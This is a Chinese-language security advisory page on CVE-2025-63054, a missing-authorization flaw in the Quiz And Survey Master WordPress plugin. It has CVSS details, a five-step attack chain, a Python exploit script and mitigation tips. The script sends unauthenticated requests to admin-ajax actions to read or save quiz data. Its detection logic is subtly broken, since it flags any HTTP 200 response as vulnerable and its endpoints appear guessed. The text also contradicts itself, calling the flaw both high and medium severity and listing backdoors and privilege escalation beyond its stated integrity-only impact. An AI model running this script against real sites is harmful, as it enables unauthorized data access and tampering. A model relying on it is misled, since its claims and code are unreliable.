CVE-2025-63054 Quiz And Survey Master 缺少授权访问控制漏洞

漏洞信息

漏洞编号

CVE-2025-63054

漏洞类型

缺少授权/访问控制

CVSS评分

5.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

ExpressTech Systems Quiz And Survey Master (quiz-master-next)

漏洞概述

CVE-2025-63054是ExpressTech Systems开发的WordPress插件Quiz And Survey Master中的一个高危安全漏洞。该漏洞类型为缺少授权（Missing Authorization），存在于插件的访问控制安全级别配置中。攻击者无需任何认证凭证即可利用此漏洞，访问本应受保护的敏感功能或数据。漏洞影响范围覆盖插件从初始版本到10.3.2版本的所有用户。由于该插件广泛用于创建和管理在线测验及调查，受影响网站可能面临用户数据泄露、问卷内容被篡改等风险。CVSS 3.1评分5.3，属于中等严重程度，主要风险在于完整性影响（可修改数据）而非机密性或可用性。Patchstack安全团队于2025年12月9日披露此漏洞，建议用户立即采取修复措施。

技术细节

该漏洞源于Quiz And Survey Master插件在实现访问控制检查时的缺陷。插件在处理某些关键功能时未能正确验证用户权限，允许未授权用户执行本应需要管理员权限的操作。具体而言，插件的quiz-master-next组件在配置安全级别时存在访问控制逻辑错误，使得攻击者可以通过构造特定的HTTP请求来绕过权限检查。攻击者利用此漏洞无需登录即可访问管理功能，可能导致：(1) 获取所有测验和调查的完整内容；(2) 修改现有测验配置和题目；(3) 导出敏感的用户答题数据；(4) 在某些情况下可能提升权限。由于CVSS向量显示攻击复杂度低（AC:L）且无需认证（PR:N），攻击者可以自动化批量扫描和利用此类漏洞。修复版本应包含对所有管理端点的完整权限验证逻辑。

攻击链分析

STEP 1

步骤1: 信息收集

攻击者扫描目标WordPress网站，识别是否安装Quiz And Survey Master插件及其版本号（<=10.3.2）

STEP 2

步骤2: 漏洞探测

攻击者构造HTTP请求访问本应需要管理员权限的API端点，验证是否存在访问控制缺陷

STEP 3

步骤3: 未授权访问

由于缺少权限验证，攻击者成功绕过认证机制，访问敏感管理功能或数据

STEP 4

步骤4: 数据窃取或篡改

攻击者利用获取的访问权限，窃取问卷内容、用户答题数据，或修改测验配置

STEP 5

步骤5: 持久化控制

在某些情况下，攻击者可能利用此漏洞进一步提升权限，建立持久化后门

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2025-63054 PoC - Missing Authorization in Quiz And Survey Master
# Target: WordPress site with vulnerable Quiz And Survey Master plugin (<= 10.3.2)

def check_vulnerability(target_url):
    """
    Check if target is vulnerable to CVE-2025-63054
    Missing Authorization via incorrectly configured access control
    """
    
    # Try to access admin functions without authentication
    endpoints = [
        '/wp-admin/admin-ajax.php',
        '/wp-json/wp/v2/quiz-master-next',
        '/wp-content/plugins/quiz-master-next/includes/classes/',
    ]
    
    for endpoint in endpoints:
        url = target_url.rstrip('/') + endpoint
        try:
            response = requests.get(url, timeout=10, verify=False)
            # Check if we can access admin-protected content
            if response.status_code == 200:
                print(f"[!] Potentially vulnerable endpoint found: {url}")
                print(f"[+] Status code: {response.status_code}")
                return True
        except requests.RequestException as e:
            print(f"[-] Error accessing {url}: {e}")
    
    return False

def exploit_authorization_bypass(target_url):
    """
    Exploit the missing authorization vulnerability
    Try to access or modify quiz data without admin privileges
    """
    
    # Common quiz master next API endpoints
    api_endpoints = [
        '/wp-admin/admin-ajax.php?action=qsm_get_quiz_data',
        '/wp-admin/admin-ajax.php?action=qsm_save_quiz',
    ]
    
    print("[*] Attempting to exploit CVE-2025-63054...")
    
    for endpoint in api_endpoints:
        url = target_url.rstrip('/') + endpoint
        headers = {
            'User-Agent': 'Mozilla/5.0 (compatible; CVE-2025-63054-PoC)',
            'X-Requested-With': 'XMLHttpRequest'
        }
        
        try:
            response = requests.post(url, headers=headers, timeout=10, verify=False)
            # Check if response indicates successful unauthorized access
            if response.status_code == 200 and 'quiz' in response.text.lower():
                print(f"[!] VULNERABLE: {url}")
                print(f"[+] Response preview: {response.text[:200]}")
                return True
        except requests.RequestException as e:
            print(f"[-] Request failed: {e}")
    
    print("[*] Exploitation attempt completed")
    return False

if __name__ == '__main__':
    if len(sys.argv) < 2:
        print("Usage: python cve-2025-63054.py <target_url>")
        print("Example: python cve-2025-63054.py http://example.com")
        sys.exit(1)
    
    target = sys.argv[1]
    print(f"[*] Testing target: {target}")
    print(f"[*] CVE-2025-63054: Quiz And Survey Master Missing Authorization\n")
    
    if check_vulnerability(target):
        exploit_authorization_bypass(target)
    else:
        print("[*] Target may not be vulnerable")

影响范围

Quiz And Survey Master (quiz-master-next) <= 10.3.2

防御指南

临时缓解措施

如果无法立即升级，可采取以下临时缓解措施：(1) 限制wp-admin目录访问，仅允许受信任IP访问；(2) 使用WordPress安全插件如Wordfence或Sucuri监控异常请求；(3) 暂时禁用Quiz And Survey Master插件直到完成升级；(4) 检查并删除所有未知的管理员账户；(5) 审计最近的日志，查找是否有未授权访问迹象。建议尽快迁移到官方修复版本以彻底消除安全风险。